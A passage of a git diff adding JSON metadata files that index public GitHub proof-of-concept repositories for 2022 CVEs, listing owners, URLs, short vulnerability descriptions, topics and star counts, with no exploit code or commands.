"iTop < 2.7.6 - (Authenticated) Remote command execution", + "fork": false, + "created_at": "2022-09-02T07:46:36Z", + "updated_at": "2024-08-12T20:26:41Z", + "pushed_at": "2022-09-02T07:48:18Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-24780", + "exploit", + "rce", + "ssti" + ], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24818.json b/2022/CVE-2022-24818.json new file mode 100644 index 0000000000..3888387d64 --- /dev/null +++ b/2022/CVE-2022-24818.json @@ -0,0 +1,40 @@ +[ + { + "id": 780425505, + "name": "CVE-2022-24818", + "full_name": "mbadanoiu\/CVE-2022-24818", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-24818", + "description": "CVE-2022-24818: Java Deserialization via Unchecked JNDI Lookups in GeoServer and GeoTools", + "fork": false, + "created_at": "2024-04-01T13:06:31Z", + "updated_at": "2024-04-01T16:48:19Z", + "pushed_at": "2024-04-01T16:45:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-24818", + "cves", + "deserialization", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24834.json b/2022/CVE-2022-24834.json new file mode 100644 index 0000000000..38d2c9ec2e --- /dev/null +++ b/2022/CVE-2022-24834.json @@ -0,0 +1,64 @@ +[ + { + "id": 672017875, + "name": "CVE-2022-24834", + "full_name": "convisolabs\/CVE-2022-24834", + "owner": { + "login": "convisolabs", + "id": 92468795, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92468795?v=4", + "html_url": "https:\/\/github.com\/convisolabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/convisolabs\/CVE-2022-24834", + "description": null, + "fork": false, + "created_at": "2023-07-28T17:42:33Z", + "updated_at": "2024-08-19T08:56:47Z", + "pushed_at": "2023-07-28T17:54:59Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 22, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 844114285, + "name": "CVE-2022-24834-", + "full_name": "DukeSec97\/CVE-2022-24834-", + "owner": { + "login": "DukeSec97", + "id": 59002589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59002589?v=4", + "html_url": "https:\/\/github.com\/DukeSec97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DukeSec97\/CVE-2022-24834-", + "description": null, + "fork": false, + "created_at": "2024-08-18T12:33:36Z", + "updated_at": "2024-08-18T12:39:19Z", + "pushed_at": "2024-08-18T12:39:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24853.json b/2022/CVE-2022-24853.json new file mode 100644 index 0000000000..d5e7f61a3c --- /dev/null +++ b/2022/CVE-2022-24853.json @@ -0,0 +1,33 @@ +[ + { + "id": 482345740, + "name": "CVE-2022-24853", + "full_name": "secure-77\/CVE-2022-24853", + "owner": { + "login": "secure-77", + "id": 31564517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31564517?v=4", + "html_url": "https:\/\/github.com\/secure-77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secure-77\/CVE-2022-24853", + "description": "Metabase NTLM Attack ", + "fork": false, + "created_at": "2022-04-16T19:41:15Z", + "updated_at": "2022-12-08T05:06:18Z", + "pushed_at": "2022-08-12T09:05:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24924.json b/2022/CVE-2022-24924.json new file mode 100644 index 0000000000..9eb3efc459 --- /dev/null +++ b/2022/CVE-2022-24924.json @@ -0,0 +1,33 @@ +[ + { + "id": 488814822, + "name": "CVE-2022-24924", + "full_name": "heegong\/CVE-2022-24924", + "owner": { + "login": "heegong", + "id": 57859128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57859128?v=4", + "html_url": "https:\/\/github.com\/heegong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/heegong\/CVE-2022-24924", + "description": "An improper access control in LiveWallpaperService prior to versions 3.0.9.0 allows to create a specific named system directory without a proper permission.", + "fork": false, + "created_at": "2022-05-05T03:08:53Z", + "updated_at": "2023-12-04T04:26:16Z", + "pushed_at": "2022-05-12T00:16:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24934.json b/2022/CVE-2022-24934.json new file mode 100644 index 0000000000..b8d130b148 --- /dev/null +++ b/2022/CVE-2022-24934.json @@ -0,0 +1,126 @@ +[ + { + "id": 473965328, + "name": "CVE-2022-24934", + "full_name": "nanaao\/CVE-2022-24934", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-24934", + "description": " CVE-2022-24934", + "fork": false, + "created_at": "2022-03-25T10:29:35Z", + "updated_at": "2024-08-12T20:21:50Z", + "pushed_at": "2022-03-25T07:19:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 475017381, + "name": "WPS-CVE-2022-24934", + "full_name": "ASkyeye\/WPS-CVE-2022-24934", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/WPS-CVE-2022-24934", + "description": "Fake WPS Update Server PoC", + "fork": false, + "created_at": "2022-03-28T13:35:37Z", + "updated_at": "2022-06-19T08:49:27Z", + "pushed_at": "2022-03-28T12:23:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 476247545, + "name": "CVE-2022-24934", + "full_name": "webraybtl\/CVE-2022-24934", + "owner": { + "login": "webraybtl", + "id": 95903558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95903558?v=4", + "html_url": "https:\/\/github.com\/webraybtl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/webraybtl\/CVE-2022-24934", + "description": null, + "fork": false, + "created_at": "2022-03-31T09:59:01Z", + "updated_at": "2024-08-12T20:22:01Z", + "pushed_at": "2023-09-08T05:45:36Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 481901699, + "name": "WPS-CVE-2022-24934", + "full_name": "MagicPiperSec\/WPS-CVE-2022-24934", + "owner": { + "login": "MagicPiperSec", + "id": 69208919, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69208919?v=4", + "html_url": "https:\/\/github.com\/MagicPiperSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MagicPiperSec\/WPS-CVE-2022-24934", + "description": null, + "fork": false, + "created_at": "2022-04-15T09:08:00Z", + "updated_at": "2023-12-18T09:32:37Z", + "pushed_at": "2022-04-15T09:13:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24990.json b/2022/CVE-2022-24990.json new file mode 100644 index 0000000000..b8126cca84 --- /dev/null +++ b/2022/CVE-2022-24990.json @@ -0,0 +1,188 @@ +[ + { + "id": 467319862, + "name": "CVE-2022-24990-TerraMaster-TOS--PHP-", + "full_name": "Jaky5155\/CVE-2022-24990-TerraMaster-TOS--PHP-", + "owner": { + "login": "Jaky5155", + "id": 47801640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47801640?v=4", + "html_url": "https:\/\/github.com\/Jaky5155", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jaky5155\/CVE-2022-24990-TerraMaster-TOS--PHP-", + "description": "CVE-2022-24990:TerraMaster TOS 通过 PHP 对象实例化执行未经身份验证的远程命令", + "fork": false, + "created_at": "2022-03-08T01:28:32Z", + "updated_at": "2022-03-09T01:57:51Z", + "pushed_at": "2022-03-08T01:40:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468177153, + "name": "CVE-2022-24990-POC", + "full_name": "VVeakee\/CVE-2022-24990-POC", + "owner": { + "login": "VVeakee", + "id": 85714114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85714114?v=4", + "html_url": "https:\/\/github.com\/VVeakee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VVeakee\/CVE-2022-24990-POC", + "description": "仅仅是poc,并不是exp", + "fork": false, + "created_at": "2022-03-10T03:16:04Z", + "updated_at": "2024-11-16T19:54:24Z", + "pushed_at": "2022-03-15T12:58:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 471885760, + "name": "CVE-2022-24990", + "full_name": "0xf4n9x\/CVE-2022-24990", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2022-24990", + "description": "CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation", + "fork": false, + "created_at": "2022-03-20T05:15:16Z", + "updated_at": "2024-08-12T20:21:42Z", + "pushed_at": "2022-04-25T04:58:24Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 471886733, + "name": "CVE-2022-24990", + "full_name": "lishang520\/CVE-2022-24990", + "owner": { + "login": "lishang520", + "id": 60433249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60433249?v=4", + "html_url": "https:\/\/github.com\/lishang520", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lishang520\/CVE-2022-24990", + "description": "CVE-2022-24990信息泄露+RCE 一条龙", + "fork": false, + "created_at": "2022-03-20T05:21:08Z", + "updated_at": "2024-09-10T06:24:04Z", + "pushed_at": "2022-03-29T11:03:22Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 39, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 480629331, + "name": "CVE-2022-24990", + "full_name": "ZZ-SOCMAP\/CVE-2022-24990", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-24990", + "description": "TerraMaster TOS Unauthenticated Remote Command Execution(RCE) Vulnerability CVE-2022-24990", + "fork": false, + "created_at": "2022-04-12T02:45:56Z", + "updated_at": "2024-09-19T01:49:51Z", + "pushed_at": "2022-04-12T03:17:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552773170, + "name": "terraMaster-CVE-2022-24990", + "full_name": "jsongmax\/terraMaster-CVE-2022-24990", + "owner": { + "login": "jsongmax", + "id": 54309806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54309806?v=4", + "html_url": "https:\/\/github.com\/jsongmax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsongmax\/terraMaster-CVE-2022-24990", + "description": null, + "fork": false, + "created_at": "2022-10-17T07:54:13Z", + "updated_at": "2023-11-21T01:52:22Z", + "pushed_at": "2022-10-17T08:12:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24992.json b/2022/CVE-2022-24992.json new file mode 100644 index 0000000000..1fe42bb508 --- /dev/null +++ b/2022/CVE-2022-24992.json @@ -0,0 +1,33 @@ +[ + { + "id": 665143568, + "name": "CVE-2022-24992", + "full_name": "n0lsecurity\/CVE-2022-24992", + "owner": { + "login": "n0lsecurity", + "id": 91031441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91031441?v=4", + "html_url": "https:\/\/github.com\/n0lsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0lsecurity\/CVE-2022-24992", + "description": "CVE-2022–24992", + "fork": false, + "created_at": "2023-07-11T14:26:58Z", + "updated_at": "2023-07-11T14:26:59Z", + "pushed_at": "2023-07-11T14:28:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-24999.json b/2022/CVE-2022-24999.json new file mode 100644 index 0000000000..e79cac37ea --- /dev/null +++ b/2022/CVE-2022-24999.json @@ -0,0 +1,33 @@ +[ + { + "id": 482744393, + "name": "CVE-2022-24999", + "full_name": "n8tz\/CVE-2022-24999", + "owner": { + "login": "n8tz", + "id": 20491954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20491954?v=4", + "html_url": "https:\/\/github.com\/n8tz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n8tz\/CVE-2022-24999", + "description": "\"qs\" prototype poisoning vulnerability ( CVE-2022-24999 )", + "fork": false, + "created_at": "2022-04-18T06:46:49Z", + "updated_at": "2024-06-21T19:06:00Z", + "pushed_at": "2022-10-13T12:48:39Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25012.json b/2022/CVE-2022-25012.json new file mode 100644 index 0000000000..ce4f39ff23 --- /dev/null +++ b/2022/CVE-2022-25012.json @@ -0,0 +1,33 @@ +[ + { + "id": 622083074, + "name": "CVE-2022-25012", + "full_name": "s3l33\/CVE-2022-25012", + "owner": { + "login": "s3l33", + "id": 60675004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60675004?v=4", + "html_url": "https:\/\/github.com\/s3l33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3l33\/CVE-2022-25012", + "description": "Updated version of this weak password encryption script", + "fork": false, + "created_at": "2023-04-01T04:21:18Z", + "updated_at": "2024-08-08T03:48:16Z", + "pushed_at": "2023-04-01T04:38:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25018.json b/2022/CVE-2022-25018.json new file mode 100644 index 0000000000..4b99f145bb --- /dev/null +++ b/2022/CVE-2022-25018.json @@ -0,0 +1,33 @@ +[ + { + "id": 463453899, + "name": "CVE-2022-25018", + "full_name": "MoritzHuppert\/CVE-2022-25018", + "owner": { + "login": "MoritzHuppert", + "id": 35614875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35614875?v=4", + "html_url": "https:\/\/github.com\/MoritzHuppert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MoritzHuppert\/CVE-2022-25018", + "description": null, + "fork": false, + "created_at": "2022-02-25T08:23:49Z", + "updated_at": "2023-10-10T01:13:05Z", + "pushed_at": "2022-02-25T09:06:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25020.json b/2022/CVE-2022-25020.json new file mode 100644 index 0000000000..ae2685fef3 --- /dev/null +++ b/2022/CVE-2022-25020.json @@ -0,0 +1,33 @@ +[ + { + "id": 463454154, + "name": "CVE-2022-25020", + "full_name": "MoritzHuppert\/CVE-2022-25020", + "owner": { + "login": "MoritzHuppert", + "id": 35614875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35614875?v=4", + "html_url": "https:\/\/github.com\/MoritzHuppert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MoritzHuppert\/CVE-2022-25020", + "description": null, + "fork": false, + "created_at": "2022-02-25T08:24:44Z", + "updated_at": "2022-11-09T18:15:24Z", + "pushed_at": "2022-02-25T09:06:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25022.json b/2022/CVE-2022-25022.json new file mode 100644 index 0000000000..f03a9f63ed --- /dev/null +++ b/2022/CVE-2022-25022.json @@ -0,0 +1,33 @@ +[ + { + "id": 463454611, + "name": "CVE-2022-25022", + "full_name": "MoritzHuppert\/CVE-2022-25022", + "owner": { + "login": "MoritzHuppert", + "id": 35614875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35614875?v=4", + "html_url": "https:\/\/github.com\/MoritzHuppert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MoritzHuppert\/CVE-2022-25022", + "description": null, + "fork": false, + "created_at": "2022-02-25T08:26:12Z", + "updated_at": "2022-11-09T18:15:24Z", + "pushed_at": "2022-02-25T09:06:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25060.json b/2022/CVE-2022-25060.json new file mode 100644 index 0000000000..a4eeb17fcd --- /dev/null +++ b/2022/CVE-2022-25060.json @@ -0,0 +1,33 @@ +[ + { + "id": 463683132, + "name": "CVE-2022-25060", + "full_name": "exploitwritter\/CVE-2022-25060", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25060", + "description": "This script exploits a remote command execution vulnerability under the oal_startPing component in the TPLink WR840N router.", + "fork": false, + "created_at": "2022-02-25T21:42:01Z", + "updated_at": "2022-03-08T02:54:26Z", + "pushed_at": "2022-02-25T21:43:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25061.json b/2022/CVE-2022-25061.json new file mode 100644 index 0000000000..18f943ffd6 --- /dev/null +++ b/2022/CVE-2022-25061.json @@ -0,0 +1,33 @@ +[ + { + "id": 463678168, + "name": "CVE-2022-25061", + "full_name": "exploitwritter\/CVE-2022-25061", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25061", + "description": "This script exploits a remote command execution vulnerability under the oal_setIp6DefaultRoute component in the TPLink WR840N router.", + "fork": false, + "created_at": "2022-02-25T21:18:11Z", + "updated_at": "2022-03-08T02:54:47Z", + "pushed_at": "2022-02-25T21:38:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25062.json b/2022/CVE-2022-25062.json new file mode 100644 index 0000000000..a83b55b516 --- /dev/null +++ b/2022/CVE-2022-25062.json @@ -0,0 +1,33 @@ +[ + { + "id": 463687842, + "name": "CVE-2022-25062", + "full_name": "exploitwritter\/CVE-2022-25062", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25062", + "description": "This script exploits a vulnerability (IoF) in the TPLink WR840N router, using a field for injecting code in the module DNS.", + "fork": false, + "created_at": "2022-02-25T22:04:41Z", + "updated_at": "2022-03-08T02:54:11Z", + "pushed_at": "2022-02-25T22:07:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25063.json b/2022/CVE-2022-25063.json new file mode 100644 index 0000000000..3d09aa9031 --- /dev/null +++ b/2022/CVE-2022-25063.json @@ -0,0 +1,33 @@ +[ + { + "id": 463690604, + "name": "CVE-2022-25063", + "full_name": "exploitwritter\/CVE-2022-25063", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25063", + "description": "This script exploits a vulnerability (XSS) in the TPLink WR840N router, using a field for injecting javascript code.", + "fork": false, + "created_at": "2022-02-25T22:18:55Z", + "updated_at": "2022-03-08T02:53:48Z", + "pushed_at": "2022-02-25T22:19:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25064.json b/2022/CVE-2022-25064.json new file mode 100644 index 0000000000..9c6daa8431 --- /dev/null +++ b/2022/CVE-2022-25064.json @@ -0,0 +1,64 @@ +[ + { + "id": 463693563, + "name": "CVE-2022-25064", + "full_name": "exploitwritter\/CVE-2022-25064", + "owner": { + "login": "exploitwritter", + "id": 47488127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2022-25064", + "description": "This script exploits a remote command execution vulnerability in the TPLink WR840N router, using the configure function IPv6 protocol.", + "fork": false, + "created_at": "2022-02-25T22:34:38Z", + "updated_at": "2022-03-08T02:53:01Z", + "pushed_at": "2022-02-25T22:38:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464942561, + "name": "CVE-2022-25064", + "full_name": "Mr-xn\/CVE-2022-25064", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-25064", + "description": null, + "fork": false, + "created_at": "2022-03-01T15:10:20Z", + "updated_at": "2024-08-12T20:21:07Z", + "pushed_at": "2022-03-05T01:02:42Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25089.json b/2022/CVE-2022-25089.json new file mode 100644 index 0000000000..f033c0a783 --- /dev/null +++ b/2022/CVE-2022-25089.json @@ -0,0 +1,38 @@ +[ + { + "id": 457914028, + "name": "printix-CVE-2022-25089", + "full_name": "ComparedArray\/printix-CVE-2022-25089", + "owner": { + "login": "ComparedArray", + "id": 45703484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45703484?v=4", + "html_url": "https:\/\/github.com\/ComparedArray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComparedArray\/printix-CVE-2022-25089", + "description": "An \"Incorrect Use of a Privileged API\" vulnerability in PrintixService.exe, in Printix's \"Printix Secure Cloud Print Management\", Version 1.3.1106.0 and below allows a Local Or Remote attacker the ability change all HKEY Windows Registry values as SYSTEM context via the UITasks.PersistentRegistryData parameter.", + "fork": false, + "created_at": "2022-02-10T19:12:43Z", + "updated_at": "2024-08-12T20:20:29Z", + "pushed_at": "2022-05-10T14:33:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "pentesting", + "printix" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-25090.json b/2022/CVE-2022-25090.json new file mode 100644 index 0000000000..30f2570ab0 --- /dev/null +++ b/2022/CVE-2022-25090.json @@ -0,0 +1,38 @@ +[ + { + "id": 465312209, + "name": "printix-CVE-2022-25090", + "full_name": "ComparedArray\/printix-CVE-2022-25090", + "owner": { + "login": "ComparedArray", + "id": 45703484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45703484?v=4", + "html_url": "https:\/\/github.com\/ComparedArray", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ComparedArray\/printix-CVE-2022-25090", + "description": "A \"Creation of Temporary Files in Directory with Insecure Permissions\" vulnerability in PrintixService.exe, in Printix's \"Printix Secure Cloud Print Management\", Version 1.3.1106.0 and below allows any logged in user to elevate any executable or file to the SYSTEM context. This is achieved by exploiting race conditions in the Installer.", + "fork": false, + 